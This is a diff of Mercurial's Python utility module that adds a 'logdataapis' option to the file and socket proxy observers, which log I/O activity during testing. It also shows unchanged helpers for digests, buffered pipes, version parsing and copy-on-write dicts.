286 286 raise Abort(_('unknown digest type: %s') % k)
287 287 self._hashes[k] = DIGESTS[k]()
288 288 if s:
289 289 self.update(s)
290 290
291 291 def update(self, data):
292 292 for h in self._hashes.values():
293 293 h.update(data)
294 294
295 295 def __getitem__(self, key):
296 296 if key not in DIGESTS:
297 297 raise Abort(_('unknown digest type: %s') % k)
298 298 return nodemod.hex(self._hashes[key].digest())
299 299
300 300 def __iter__(self):
301 301 return iter(self._hashes)
302 302
303 303 @staticmethod
304 304 def preferred(supported):
305 305 """returns the strongest digest type in both supported and DIGESTS."""
306 306
307 307 for k in DIGESTS_BY_STRENGTH:
308 308 if k in supported:
309 309 return k
310 310 return None
311 311
312 312 class digestchecker(object):
313 313 """file handle wrapper that additionally checks content against a given
314 314 size and digests.
315 315
316 316 d = digestchecker(fh, size, {'md5': '...'})
317 317
318 318 When multiple digests are given, all of them are validated.
319 319 """
320 320
321 321 def __init__(self, fh, size, digests):
322 322 self._fh = fh
323 323 self._size = size
324 324 self._got = 0
325 325 self._digests = dict(digests)
326 326 self._digester = digester(self._digests.keys())
327 327
328 328 def read(self, length=-1):
329 329 content = self._fh.read(length)
330 330 self._digester.update(content)
331 331 self._got += len(content)
332 332 return content
333 333
334 334 def validate(self):
335 335 if self._size != self._got:
336 336 raise Abort(_('size mismatch: expected %d, got %d') %
337 337 (self._size, self._got))
338 338 for k, v in self._digests.items():
339 339 if v != self._digester[k]:
340 340 # i18n: first parameter is a digest name
341 341 raise Abort(_('%s mismatch: expected %s, got %s') %
342 342 (k, v, self._digester[k]))
343 343
344 344 try:
345 345 buffer = buffer
346 346 except NameError:
347 347 def buffer(sliceable, offset=0, length=None):
348 348 if length is not None:
349 349 return memoryview(sliceable)[offset:offset + length]
350 350 return memoryview(sliceable)[offset:]
351 351
352 352 closefds = pycompat.isposix
353 353
354 354 _chunksize = 4096
355 355
356 356 class bufferedinputpipe(object):
357 357 """a manually buffered input pipe
358 358
359 359 Python will not let us use buffered IO and lazy reading with 'polling' at
360 360 the same time. We cannot probe the buffer state and select will not detect
361 361 that data are ready to read if they are already buffered.
362 362
363 363 This class let us work around that by implementing its own buffering
364 364 (allowing efficient readline) while offering a way to know if the buffer is
365 365 empty from the output (allowing collaboration of the buffer with polling).
366 366
367 367 This class lives in the 'util' module because it makes use of the 'os'
368 368 module from the python stdlib.
369 369 """
370 370 def __new__(cls, fh):
371 371 # If we receive a fileobjectproxy, we need to use a variation of this
372 372 # class that notifies observers about activity.
373 373 if isinstance(fh, fileobjectproxy):
374 374 cls = observedbufferedinputpipe
375 375
376 376 return super(bufferedinputpipe, cls).__new__(cls)
377 377
378 378 def __init__(self, input):
379 379 self._input = input
380 380 self._buffer = []
381 381 self._eof = False
382 382 self._lenbuf = 0
383 383
384 384 @property
385 385 def hasbuffer(self):
386 386 """True is any data is currently buffered
387 387
388 388 This will be used externally a pre-step for polling IO. If there is
389 389 already data then no polling should be set in place."""
390 390 return bool(self._buffer)
391 391
392 392 @property
393 393 def closed(self):
394 394 return self._input.closed
395 395
396 396 def fileno(self):
397 397 return self._input.fileno()
398 398
399 399 def close(self):
400 400 return self._input.close()
401 401
402 402 def read(self, size):
403 403 while (not self._eof) and (self._lenbuf < size):
404 404 self._fillbuffer()
405 405 return self._frombuffer(size)
406 406
407 407 def readline(self, *args, **kwargs):
408 408 if 1 < len(self._buffer):
409 409 # this should not happen because both read and readline end with a
410 410 # _frombuffer call that collapse it.
411 411 self._buffer = [''.join(self._buffer)]
412 412 self._lenbuf = len(self._buffer[0])
413 413 lfi = -1
414 414 if self._buffer:
415 415 lfi = self._buffer[-1].find('\n')
416 416 while (not self._eof) and lfi < 0:
417 417 self._fillbuffer()
418 418 if self._buffer:
419 419 lfi = self._buffer[-1].find('\n')
420 420 size = lfi + 1
421 421 if lfi < 0: # end of file
422 422 size = self._lenbuf
423 423 elif 1 < len(self._buffer):
424 424 # we need to take previous chunks into account
425 425 size += self._lenbuf - len(self._buffer[-1])
426 426 return self._frombuffer(size)
427 427
428 428 def _frombuffer(self, size):
429 429 """return at most 'size' data from the buffer
430 430
431 431 The data are removed from the buffer."""
432 432 if size == 0 or not self._buffer:
433 433 return ''
434 434 buf = self._buffer[0]
435 435 if 1 < len(self._buffer):
436 436 buf = ''.join(self._buffer)
437 437
438 438 data = buf[:size]
439 439 buf = buf[len(data):]
440 440 if buf:
441 441 self._buffer = [buf]
442 442 self._lenbuf = len(buf)
443 443 else:
444 444 self._buffer = []
445 445 self._lenbuf = 0
446 446 return data
447 447
448 448 def _fillbuffer(self):
449 449 """read data to the buffer"""
450 450 data = os.read(self._input.fileno(), _chunksize)
451 451 if not data:
452 452 self._eof = True
453 453 else:
454 454 self._lenbuf += len(data)
455 455 self._buffer.append(data)
456 456
457 457 return data
458 458
459 459 def mmapread(fp):
460 460 try:
461 461 fd = getattr(fp, 'fileno', lambda: fp)()
462 462 return mmap.mmap(fd, 0, access=mmap.ACCESS_READ)
463 463 except ValueError:
464 464 # Empty files cannot be mmapped, but mmapread should still work. Check
465 465 # if the file is empty, and if so, return an empty buffer.
466 466 if os.fstat(fd).st_size == 0:
467 467 return ''
468 468 raise
469 469
470 470 def popen2(cmd, env=None, newlines=False):
471 471 # Setting bufsize to -1 lets the system decide the buffer size.
472 472 # The default for bufsize is 0, meaning unbuffered. This leads to
473 473 # poor performance on Mac OS X: http://bugs.python.org/issue4194
474 474 p = subprocess.Popen(cmd, shell=True, bufsize=-1,
475 475 close_fds=closefds,
476 476 stdin=subprocess.PIPE, stdout=subprocess.PIPE,
477 477 universal_newlines=newlines,
478 478 env=env)
479 479 return p.stdin, p.stdout
480 480
481 481 def popen3(cmd, env=None, newlines=False):
482 482 stdin, stdout, stderr, p = popen4(cmd, env, newlines)
483 483 return stdin, stdout, stderr
484 484
485 485 def popen4(cmd, env=None, newlines=False, bufsize=-1):
486 486 p = subprocess.Popen(cmd, shell=True, bufsize=bufsize,
487 487 close_fds=closefds,
488 488 stdin=subprocess.PIPE, stdout=subprocess.PIPE,
489 489 stderr=subprocess.PIPE,
490 490 universal_newlines=newlines,
491 491 env=env)
492 492 return p.stdin, p.stdout, p.stderr, p
493 493
494 494 class fileobjectproxy(object):
495 495 """A proxy around file objects that tells a watcher when events occur.
496 496
497 497 This type is intended to only be used for testing purposes. Think hard
498 498 before using it in important code.
499 499 """
500 500 __slots__ = (
501 501 r'_orig',
502 502 r'_observer',
503 503 )
504 504
505 505 def __init__(self, fh, observer):
506 506 object.__setattr__(self, r'_orig', fh)
507 507 object.__setattr__(self, r'_observer', observer)
508 508
509 509 def __getattribute__(self, name):
510 510 ours = {
511 511 r'_observer',
512 512
513 513 # IOBase
514 514 r'close',
515 515 # closed if a property
516 516 r'fileno',
517 517 r'flush',
518 518 r'isatty',
519 519 r'readable',
520 520 r'readline',
521 521 r'readlines',
522 522 r'seek',
523 523 r'seekable',
524 524 r'tell',
525 525 r'truncate',
526 526 r'writable',
527 527 r'writelines',
528 528 # RawIOBase
529 529 r'read',
530 530 r'readall',
531 531 r'readinto',
532 532 r'write',
533 533 # BufferedIOBase
534 534 # raw is a property
535 535 r'detach',
536 536 # read defined above
537 537 r'read1',
538 538 # readinto defined above
539 539 # write defined above
540 540 }
541 541
542 542 # We only observe some methods.
543 543 if name in ours:
544 544 return object.__getattribute__(self, name)
545 545
546 546 return getattr(object.__getattribute__(self, r'_orig'), name)
547 547
548 548 def __nonzero__(self):
549 549 return bool(object.__getattribute__(self, r'_orig'))
550 550
551 551 __bool__ = __nonzero__
552 552
553 553 def __delattr__(self, name):
554 554 return delattr(object.__getattribute__(self, r'_orig'), name)
555 555
556 556 def __setattr__(self, name, value):
557 557 return setattr(object.__getattribute__(self, r'_orig'), name, value)
558 558
559 559 def __iter__(self):
560 560 return object.__getattribute__(self, r'_orig').__iter__()
561 561
562 562 def _observedcall(self, name, *args, **kwargs):
563 563 # Call the original object.
564 564 orig = object.__getattribute__(self, r'_orig')
565 565 res = getattr(orig, name)(*args, **kwargs)
566 566
567 567 # Call a method on the observer of the same name with arguments
568 568 # so it can react, log, etc.
569 569 observer = object.__getattribute__(self, r'_observer')
570 570 fn = getattr(observer, name, None)
571 571 if fn:
572 572 fn(res, *args, **kwargs)
573 573
574 574 return res
575 575
576 576 def close(self, *args, **kwargs):
577 577 return object.__getattribute__(self, r'_observedcall')(
578 578 r'close', *args, **kwargs)
579 579
580 580 def fileno(self, *args, **kwargs):
581 581 return object.__getattribute__(self, r'_observedcall')(
582 582 r'fileno', *args, **kwargs)
583 583
584 584 def flush(self, *args, **kwargs):
585 585 return object.__getattribute__(self, r'_observedcall')(
586 586 r'flush', *args, **kwargs)
587 587
588 588 def isatty(self, *args, **kwargs):
589 589 return object.__getattribute__(self, r'_observedcall')(
590 590 r'isatty', *args, **kwargs)
591 591
592 592 def readable(self, *args, **kwargs):
593 593 return object.__getattribute__(self, r'_observedcall')(
594 594 r'readable', *args, **kwargs)
595 595
596 596 def readline(self, *args, **kwargs):
597 597 return object.__getattribute__(self, r'_observedcall')(
598 598 r'readline', *args, **kwargs)
599 599
600 600 def readlines(self, *args, **kwargs):
601 601 return object.__getattribute__(self, r'_observedcall')(
602 602 r'readlines', *args, **kwargs)
603 603
604 604 def seek(self, *args, **kwargs):
605 605 return object.__getattribute__(self, r'_observedcall')(
606 606 r'seek', *args, **kwargs)
607 607
608 608 def seekable(self, *args, **kwargs):
609 609 return object.__getattribute__(self, r'_observedcall')(
610 610 r'seekable', *args, **kwargs)
611 611
612 612 def tell(self, *args, **kwargs):
613 613 return object.__getattribute__(self, r'_observedcall')(
614 614 r'tell', *args, **kwargs)
615 615
616 616 def truncate(self, *args, **kwargs):
617 617 return object.__getattribute__(self, r'_observedcall')(
618 618 r'truncate', *args, **kwargs)
619 619
620 620 def writable(self, *args, **kwargs):
621 621 return object.__getattribute__(self, r'_observedcall')(
622 622 r'writable', *args, **kwargs)
623 623
624 624 def writelines(self, *args, **kwargs):
625 625 return object.__getattribute__(self, r'_observedcall')(
626 626 r'writelines', *args, **kwargs)
627 627
628 628 def read(self, *args, **kwargs):
629 629 return object.__getattribute__(self, r'_observedcall')(
630 630 r'read', *args, **kwargs)
631 631
632 632 def readall(self, *args, **kwargs):
633 633 return object.__getattribute__(self, r'_observedcall')(
634 634 r'readall', *args, **kwargs)
635 635
636 636 def readinto(self, *args, **kwargs):
637 637 return object.__getattribute__(self, r'_observedcall')(
638 638 r'readinto', *args, **kwargs)
639 639
640 640 def write(self, *args, **kwargs):
641 641 return object.__getattribute__(self, r'_observedcall')(
642 642 r'write', *args, **kwargs)
643 643
644 644 def detach(self, *args, **kwargs):
645 645 return object.__getattribute__(self, r'_observedcall')(
646 646 r'detach', *args, **kwargs)
647 647
648 648 def read1(self, *args, **kwargs):
649 649 return object.__getattribute__(self, r'_observedcall')(
650 650 r'read1', *args, **kwargs)
651 651
652 652 class observedbufferedinputpipe(bufferedinputpipe):
653 653 """A variation of bufferedinputpipe that is aware of fileobjectproxy.
654 654
655 655 ``bufferedinputpipe`` makes low-level calls to ``os.read()`` that
656 656 bypass ``fileobjectproxy``. Because of this, we need to make
657 657 ``bufferedinputpipe`` aware of these operations.
658 658
659 659 This variation of ``bufferedinputpipe`` can notify observers about
660 660 ``os.read()`` events. It also re-publishes other events, such as
661 661 ``read()`` and ``readline()``.
662 662 """
663 663 def _fillbuffer(self):
664 664 res = super(observedbufferedinputpipe, self)._fillbuffer()
665 665
666 666 fn = getattr(self._input._observer, r'osread', None)
667 667 if fn:
668 668 fn(res, _chunksize)
669 669
670 670 return res
671 671
672 672 # We use different observer methods because the operation isn't
673 673 # performed on the actual file object but on us.
674 674 def read(self, size):
675 675 res = super(observedbufferedinputpipe, self).read(size)
676 676
677 677 fn = getattr(self._input._observer, r'bufferedread', None)
678 678 if fn:
679 679 fn(res, size)
680 680
681 681 return res
682 682
683 683 def readline(self, *args, **kwargs):
684 684 res = super(observedbufferedinputpipe, self).readline(*args, **kwargs)
685 685
686 686 fn = getattr(self._input._observer, r'bufferedreadline', None)
687 687 if fn:
688 688 fn(res)
689 689
690 690 return res
691 691
692 692 PROXIED_SOCKET_METHODS = {
693 693 r'makefile',
694 694 r'recv',
695 695 r'recvfrom',
696 696 r'recvfrom_into',
697 697 r'recv_into',
698 698 r'send',
699 699 r'sendall',
700 700 r'sendto',
701 701 r'setblocking',
702 702 r'settimeout',
703 703 r'gettimeout',
704 704 r'setsockopt',
705 705 }
706 706
707 707 class socketproxy(object):
708 708 """A proxy around a socket that tells a watcher when events occur.
709 709
710 710 This is like ``fileobjectproxy`` except for sockets.
711 711
712 712 This type is intended to only be used for testing purposes. Think hard
713 713 before using it in important code.
714 714 """
715 715 __slots__ = (
716 716 r'_orig',
717 717 r'_observer',
718 718 )
719 719
720 720 def __init__(self, sock, observer):
721 721 object.__setattr__(self, r'_orig', sock)
722 722 object.__setattr__(self, r'_observer', observer)
723 723
724 724 def __getattribute__(self, name):
725 725 if name in PROXIED_SOCKET_METHODS:
726 726 return object.__getattribute__(self, name)
727 727
728 728 return getattr(object.__getattribute__(self, r'_orig'), name)
729 729
730 730 def __delattr__(self, name):
731 731 return delattr(object.__getattribute__(self, r'_orig'), name)
732 732
733 733 def __setattr__(self, name, value):
734 734 return setattr(object.__getattribute__(self, r'_orig'), name, value)
735 735
736 736 def __nonzero__(self):
737 737 return bool(object.__getattribute__(self, r'_orig'))
738 738
739 739 __bool__ = __nonzero__
740 740
741 741 def _observedcall(self, name, *args, **kwargs):
742 742 # Call the original object.
743 743 orig = object.__getattribute__(self, r'_orig')
744 744 res = getattr(orig, name)(*args, **kwargs)
745 745
746 746 # Call a method on the observer of the same name with arguments
747 747 # so it can react, log, etc.
748 748 observer = object.__getattribute__(self, r'_observer')
749 749 fn = getattr(observer, name, None)
750 750 if fn:
751 751 fn(res, *args, **kwargs)
752 752
753 753 return res
754 754
755 755 def makefile(self, *args, **kwargs):
756 756 res = object.__getattribute__(self, r'_observedcall')(
757 757 r'makefile', *args, **kwargs)
758 758
759 759 # The file object may be used for I/O. So we turn it into a
760 760 # proxy using our observer.
761 761 observer = object.__getattribute__(self, r'_observer')
762 762 return makeloggingfileobject(observer.fh, res, observer.name,
763 763 reads=observer.reads,
764 764 writes=observer.writes,
765 logdata=observer.logdata)
765 logdata=observer.logdata,
766 logdataapis=observer.logdataapis)
766 767
767 768 def recv(self, *args, **kwargs):
768 769 return object.__getattribute__(self, r'_observedcall')(
769 770 r'recv', *args, **kwargs)
770 771
771 772 def recvfrom(self, *args, **kwargs):
772 773 return object.__getattribute__(self, r'_observedcall')(
773 774 r'recvfrom', *args, **kwargs)
774 775
775 776 def recvfrom_into(self, *args, **kwargs):
776 777 return object.__getattribute__(self, r'_observedcall')(
777 778 r'recvfrom_into', *args, **kwargs)
778 779
779 780 def recv_into(self, *args, **kwargs):
780 781 return object.__getattribute__(self, r'_observedcall')(
781 782 r'recv_info', *args, **kwargs)
782 783
783 784 def send(self, *args, **kwargs):
784 785 return object.__getattribute__(self, r'_observedcall')(
785 786 r'send', *args, **kwargs)
786 787
787 788 def sendall(self, *args, **kwargs):
788 789 return object.__getattribute__(self, r'_observedcall')(
789 790 r'sendall', *args, **kwargs)
790 791
791 792 def sendto(self, *args, **kwargs):
792 793 return object.__getattribute__(self, r'_observedcall')(
793 794 r'sendto', *args, **kwargs)
794 795
795 796 def setblocking(self, *args, **kwargs):
796 797 return object.__getattribute__(self, r'_observedcall')(
797 798 r'setblocking', *args, **kwargs)
798 799
799 800 def settimeout(self, *args, **kwargs):
800 801 return object.__getattribute__(self, r'_observedcall')(
801 802 r'settimeout', *args, **kwargs)
802 803
803 804 def gettimeout(self, *args, **kwargs):
804 805 return object.__getattribute__(self, r'_observedcall')(
805 806 r'gettimeout', *args, **kwargs)
806 807
807 808 def setsockopt(self, *args, **kwargs):
808 809 return object.__getattribute__(self, r'_observedcall')(
809 810 r'setsockopt', *args, **kwargs)
810 811
811 812 DATA_ESCAPE_MAP = {pycompat.bytechr(i): br'\x%02x' % i for i in range(256)}
812 813 DATA_ESCAPE_MAP.update({
813 814 b'\\': b'\\\\',
814 815 b'\r': br'\r',
815 816 b'\n': br'\n',
816 817 })
817 818 DATA_ESCAPE_RE = remod.compile(br'[\x00-\x08\x0a-\x1f\\\x7f-\xff]')
818 819
819 820 def escapedata(s):
820 821 if isinstance(s, bytearray):
821 822 s = bytes(s)
822 823
823 824 return DATA_ESCAPE_RE.sub(lambda m: DATA_ESCAPE_MAP[m.group(0)], s)
824 825
825 826 class baseproxyobserver(object):
826 827 def _writedata(self, data):
827 828 if not self.logdata:
828 self.fh.write('\n')
829 self.fh.flush()
829 if self.logdataapis:
830 self.fh.write('\n')
831 self.fh.flush()
830 832 return
831 833
832 834 # Simple case writes all data on a single line.
833 835 if b'\n' not in data:
834 self.fh.write(': %s\n' % escapedata(data))
836 if self.logdataapis:
837 self.fh.write(': %s\n' % escapedata(data))
838 else:
839 self.fh.write('%s> %s\n' % (self.name, escapedata(data)))
835 840 self.fh.flush()
836 841 return
837 842
838 843 # Data with newlines is written to multiple lines.
839 self.fh.write(':\n')
844 if self.logdataapis:
845 self.fh.write(':\n')
846
840 847 lines = data.splitlines(True)
841 848 for line in lines:
842 849 self.fh.write('%s> %s\n' % (self.name, escapedata(line)))
843 850 self.fh.flush()
844 851
845 852 class fileobjectobserver(baseproxyobserver):
846 853 """Logs file object activity."""
847 def __init__(self, fh, name, reads=True, writes=True, logdata=False):
854 def __init__(self, fh, name, reads=True, writes=True, logdata=False,
855 logdataapis=True):
848 856 self.fh = fh
849 857 self.name = name
850 858 self.logdata = logdata
859 self.logdataapis = logdataapis
851 860 self.reads = reads
852 861 self.writes = writes
853 862
854 863 def read(self, res, size=-1):
855 864 if not self.reads:
856 865 return
857 866 # Python 3 can return None from reads at EOF instead of empty strings.
858 867 if res is None:
859 868 res = ''
860 869
861 self.fh.write('%s> read(%d) -> %d' % (self.name, size, len(res)))
870 if self.logdataapis:
871 self.fh.write('%s> read(%d) -> %d' % (self.name, size, len(res)))
872
862 873 self._writedata(res)
863 874
864 875 def readline(self, res, limit=-1):
865 876 if not self.reads:
866 877 return
867 878
868 self.fh.write('%s> readline() -> %d' % (self.name, len(res)))
879 if self.logdataapis:
880 self.fh.write('%s> readline() -> %d' % (self.name, len(res)))
881
869 882 self._writedata(res)
870 883
871 884 def readinto(self, res, dest):
872 885 if not self.reads:
873 886 return
874 887
875 self.fh.write('%s> readinto(%d) -> %r' % (self.name, len(dest),
876 res))
888 if self.logdataapis:
889 self.fh.write('%s> readinto(%d) -> %r' % (self.name, len(dest),
890 res))
891
877 892 data = dest[0:res] if res is not None else b''
878 893 self._writedata(data)
879 894
880 895 def write(self, res, data):
881 896 if not self.writes:
882 897 return
883 898
884 899 # Python 2 returns None from some write() calls. Python 3 (reasonably)
885 900 # returns the integer bytes written.
886 901 if res is None and data:
887 902 res = len(data)
888 903
889 self.fh.write('%s> write(%d) -> %r' % (self.name, len(data), res))
904 if self.logdataapis:
905 self.fh.write('%s> write(%d) -> %r' % (self.name, len(data), res))
906
890 907 self._writedata(data)
891 908
892 909 def flush(self, res):
893 910 if not self.writes:
894 911 return
895 912
896 913 self.fh.write('%s> flush() -> %r\n' % (self.name, res))
897 914
898 915 # For observedbufferedinputpipe.
899 916 def bufferedread(self, res, size):
900 self.fh.write('%s> bufferedread(%d) -> %d' % (
901 self.name, size, len(res)))
917 if not self.reads:
918 return
919
920 if self.logdataapis:
921 self.fh.write('%s> bufferedread(%d) -> %d' % (
922 self.name, size, len(res)))
923
902 924 self._writedata(res)
903 925
904 926 def bufferedreadline(self, res):
905 self.fh.write('%s> bufferedreadline() -> %d' % (self.name, len(res)))
927 if not self.reads:
928 return
929
930 if self.logdataapis:
931 self.fh.write('%s> bufferedreadline() -> %d' % (
932 self.name, len(res)))
933
906 934 self._writedata(res)
907 935
908 936 def makeloggingfileobject(logh, fh, name, reads=True, writes=True,
909 logdata=False):
937 logdata=False, logdataapis=True):
910 938 """Turn a file object into a logging file object."""
911 939
912 940 observer = fileobjectobserver(logh, name, reads=reads, writes=writes,
913 logdata=logdata)
941 logdata=logdata, logdataapis=logdataapis)
914 942 return fileobjectproxy(fh, observer)
915 943
916 944 class socketobserver(baseproxyobserver):
917 945 """Logs socket activity."""
918 946 def __init__(self, fh, name, reads=True, writes=True, states=True,
919 logdata=False):
947 logdata=False, logdataapis=True):
920 948 self.fh = fh
921 949 self.name = name
922 950 self.reads = reads
923 951 self.writes = writes
924 952 self.states = states
925 953 self.logdata = logdata
954 self.logdataapis = logdataapis
926 955
927 956 def makefile(self, res, mode=None, bufsize=None):
928 957 if not self.states:
929 958 return
930 959
931 960 self.fh.write('%s> makefile(%r, %r)\n' % (
932 961 self.name, mode, bufsize))
933 962
934 963 def recv(self, res, size, flags=0):
935 964 if not self.reads:
936 965 return
937 966
938 self.fh.write('%s> recv(%d, %d) -> %d' % (
939 self.name, size, flags, len(res)))
967 if self.logdataapis:
968 self.fh.write('%s> recv(%d, %d) -> %d' % (
969 self.name, size, flags, len(res)))
940 970 self._writedata(res)
941 971
942 972 def recvfrom(self, res, size, flags=0):
943 973 if not self.reads:
944 974 return
945 975
946 self.fh.write('%s> recvfrom(%d, %d) -> %d' % (
947 self.name, size, flags, len(res[0])))
976 if self.logdataapis:
977 self.fh.write('%s> recvfrom(%d, %d) -> %d' % (
978 self.name, size, flags, len(res[0])))
979
948 980 self._writedata(res[0])
949 981
950 982 def recvfrom_into(self, res, buf, size, flags=0):
951 983 if not self.reads:
952 984 return
953 985
954 self.fh.write('%s> recvfrom_into(%d, %d) -> %d' % (
955 self.name, size, flags, res[0]))
986 if self.logdataapis:
987 self.fh.write('%s> recvfrom_into(%d, %d) -> %d' % (
988 self.name, size, flags, res[0]))
989
956 990 self._writedata(buf[0:res[0]])
957 991
958 992 def recv_into(self, res, buf, size=0, flags=0):
959 993 if not self.reads:
960 994 return
961 995
962 self.fh.write('%s> recv_into(%d, %d) -> %d' % (
963 self.name, size, flags, res))
996 if self.logdataapis:
997 self.fh.write('%s> recv_into(%d, %d) -> %d' % (
998 self.name, size, flags, res))
999
964 1000 self._writedata(buf[0:res])
965 1001
966 1002 def send(self, res, data, flags=0):
967 1003 if not self.writes:
968 1004 return
969 1005
970 1006 self.fh.write('%s> send(%d, %d) -> %d' % (
971 1007 self.name, len(data), flags, len(res)))
972 1008 self._writedata(data)
973 1009
974 1010 def sendall(self, res, data, flags=0):
975 1011 if not self.writes:
976 1012 return
977 1013
978 # Returns None on success. So don't bother reporting return value.
979 self.fh.write('%s> sendall(%d, %d)' % (
980 self.name, len(data), flags))
1014 if self.logdataapis:
1015 # Returns None on success. So don't bother reporting return value.
1016 self.fh.write('%s> sendall(%d, %d)' % (
1017 self.name, len(data), flags))
1018
981 1019 self._writedata(data)
982 1020
983 1021 def sendto(self, res, data, flagsoraddress, address=None):
984 1022 if not self.writes:
985 1023 return
986 1024
987 1025 if address:
988 1026 flags = flagsoraddress
989 1027 else:
990 1028 flags = 0
991 1029
992 self.fh.write('%s> sendto(%d, %d, %r) -> %d' % (
993 self.name, len(data), flags, address, res))
1030 if self.logdataapis:
1031 self.fh.write('%s> sendto(%d, %d, %r) -> %d' % (
1032 self.name, len(data), flags, address, res))
1033
994 1034 self._writedata(data)
995 1035
996 1036 def setblocking(self, res, flag):
997 1037 if not self.states:
998 1038 return
999 1039
1000 1040 self.fh.write('%s> setblocking(%r)\n' % (self.name, flag))
1001 1041
1002 1042 def settimeout(self, res, value):
1003 1043 if not self.states:
1004 1044 return
1005 1045
1006 1046 self.fh.write('%s> settimeout(%r)\n' % (self.name, value))
1007 1047
1008 1048 def gettimeout(self, res):
1009 1049 if not self.states:
1010 1050 return
1011 1051
1012 1052 self.fh.write('%s> gettimeout() -> %f\n' % (self.name, res))
1013 1053
1014 1054 def setsockopt(self, level, optname, value):
1015 1055 if not self.states:
1016 1056 return
1017 1057
1018 1058 self.fh.write('%s> setsockopt(%r, %r, %r) -> %r\n' % (
1019 1059 self.name, level, optname, value))
1020 1060
1021 1061 def makeloggingsocket(logh, fh, name, reads=True, writes=True, states=True,
1022 logdata=False):
1062 logdata=False, logdataapis=True):
1023 1063 """Turn a socket into a logging socket."""
1024 1064
1025 1065 observer = socketobserver(logh, name, reads=reads, writes=writes,
1026 states=states, logdata=logdata)
1066 states=states, logdata=logdata,
1067 logdataapis=logdataapis)
1027 1068 return socketproxy(fh, observer)
1028 1069
1029 1070 def version():
1030 1071 """Return version information if available."""
1031 1072 try:
1032 1073 from . import __version__
1033 1074 return __version__.version
1034 1075 except ImportError:
1035 1076 return 'unknown'
1036 1077
1037 1078 def versiontuple(v=None, n=4):
1038 1079 """Parses a Mercurial version string into an N-tuple.
1039 1080
1040 1081 The version string to be parsed is specified with the ``v`` argument.
1041 1082 If it isn't defined, the current Mercurial version string will be parsed.
1042 1083
1043 1084 ``n`` can be 2, 3, or 4. Here is how some version strings map to
1044 1085 returned values:
1045 1086
1046 1087 >>> v = b'3.6.1+190-df9b73d2d444'
1047 1088 >>> versiontuple(v, 2)
1048 1089 (3, 6)
1049 1090 >>> versiontuple(v, 3)
1050 1091 (3, 6, 1)
1051 1092 >>> versiontuple(v, 4)
1052 1093 (3, 6, 1, '190-df9b73d2d444')
1053 1094
1054 1095 >>> versiontuple(b'3.6.1+190-df9b73d2d444+20151118')
1055 1096 (3, 6, 1, '190-df9b73d2d444+20151118')
1056 1097
1057 1098 >>> v = b'3.6'
1058 1099 >>> versiontuple(v, 2)
1059 1100 (3, 6)
1060 1101 >>> versiontuple(v, 3)
1061 1102 (3, 6, None)
1062 1103 >>> versiontuple(v, 4)
1063 1104 (3, 6, None, None)
1064 1105
1065 1106 >>> v = b'3.9-rc'
1066 1107 >>> versiontuple(v, 2)
1067 1108 (3, 9)
1068 1109 >>> versiontuple(v, 3)
1069 1110 (3, 9, None)
1070 1111 >>> versiontuple(v, 4)
1071 1112 (3, 9, None, 'rc')
1072 1113
1073 1114 >>> v = b'3.9-rc+2-02a8fea4289b'
1074 1115 >>> versiontuple(v, 2)
1075 1116 (3, 9)
1076 1117 >>> versiontuple(v, 3)
1077 1118 (3, 9, None)
1078 1119 >>> versiontuple(v, 4)
1079 1120 (3, 9, None, 'rc+2-02a8fea4289b')
1080 1121 """
1081 1122 if not v:
1082 1123 v = version()
1083 1124 parts = remod.split('[\+-]', v, 1)
1084 1125 if len(parts) == 1:
1085 1126 vparts, extra = parts[0], None
1086 1127 else:
1087 1128 vparts, extra = parts
1088 1129
1089 1130 vints = []
1090 1131 for i in vparts.split('.'):
1091 1132 try:
1092 1133 vints.append(int(i))
1093 1134 except ValueError:
1094 1135 break
1095 1136 # (3, 6) -> (3, 6, None)
1096 1137 while len(vints) < 3:
1097 1138 vints.append(None)
1098 1139
1099 1140 if n == 2:
1100 1141 return (vints[0], vints[1])
1101 1142 if n == 3:
1102 1143 return (vints[0], vints[1], vints[2])
1103 1144 if n == 4:
1104 1145 return (vints[0], vints[1], vints[2], extra)
1105 1146
1106 1147 def cachefunc(func):
1107 1148 '''cache the result of function calls'''
1108 1149 # XXX doesn't handle keywords args
1109 1150 if func.__code__.co_argcount == 0:
1110 1151 cache = []
1111 1152 def f():
1112 1153 if len(cache) == 0:
1113 1154 cache.append(func())
1114 1155 return cache[0]
1115 1156 return f
1116 1157 cache = {}
1117 1158 if func.__code__.co_argcount == 1:
1118 1159 # we gain a small amount of time because
1119 1160 # we don't need to pack/unpack the list
1120 1161 def f(arg):
1121 1162 if arg not in cache:
1122 1163 cache[arg] = func(arg)
1123 1164 return cache[arg]
1124 1165 else:
1125 1166 def f(*args):
1126 1167 if args not in cache:
1127 1168 cache[args] = func(*args)
1128 1169 return cache[args]
1129 1170
1130 1171 return f
1131 1172
1132 1173 class cow(object):
1133 1174 """helper class to make copy-on-write easier
1134 1175
1135 1176 Call preparewrite before doing any writes.
1136 1177 """
1137 1178
1138 1179 def preparewrite(self):
1139 1180 """call this before writes, return self or a copied new object"""
1140 1181 if getattr(self, '_copied', 0):
1141 1182 self._copied -= 1
1142 1183 return self.__class__(self)
1143 1184 return self
1144 1185
1145 1186 def copy(self):
1146 1187 """always do a cheap copy"""
1147 1188 self._copied = getattr(self, '_copied', 0) + 1
1148 1189 return self
1149 1190
1150 1191 class sortdict(collections.OrderedDict):
1151 1192 '''a simple sorted dictionary
1152 1193
1153 1194 >>> d1 = sortdict([(b'a', 0), (b'b', 1)])
1154 1195 >>> d2 = d1.copy()
1155 1196 >>> d2
1156 1197 sortdict([('a', 0), ('b', 1)])
1157 1198 >>> d2.update([(b'a', 2)])
1158 1199 >>> list(d2.keys()) # should still be in last-set order
1159 1200 ['b', 'a']
1160 1201 '''
1161 1202
1162 1203 def __setitem__(self, key, value):
1163 1204 if key in self:
1164 1205 del self[key]
1165 1206 super(sortdict, self).__setitem__(key, value)
1166 1207
1167 1208 if pycompat.ispypy:
1168 1209 # __setitem__() isn't called as of PyPy 5.8.0
1169 1210 def update(self, src):
1170 1211 if isinstance(src, dict):
1171 1212 src = src.iteritems()
1172 1213 for k, v in src:
1173 1214 self[k] = v
1174 1215
1175 1216 class cowdict(cow, dict):
1176 1217 """copy-on-write dict
1177 1218
1178 1219 Be sure to call d = d.preparewrite() before writing to d.
1179 1220
1180 1221 >>> a = cowdict()
1181 1222 >>> a is a.preparewrite()
1182 1223 True
1183 1224 >>> b = a.copy()
1184 1225 >>> b is a
1185 1226 True
1186 1227 >>> c = b.copy()
1187 1228 >>> c is a
1188 1229 True
1189 1230 >>> a = a.preparewrite()
1190 1231 >>> b is a
1191 1232 False
1192 1233 >>> a is a.preparewrite()
1193 1234 True
1194 1235 >>> c = c.preparewrite()
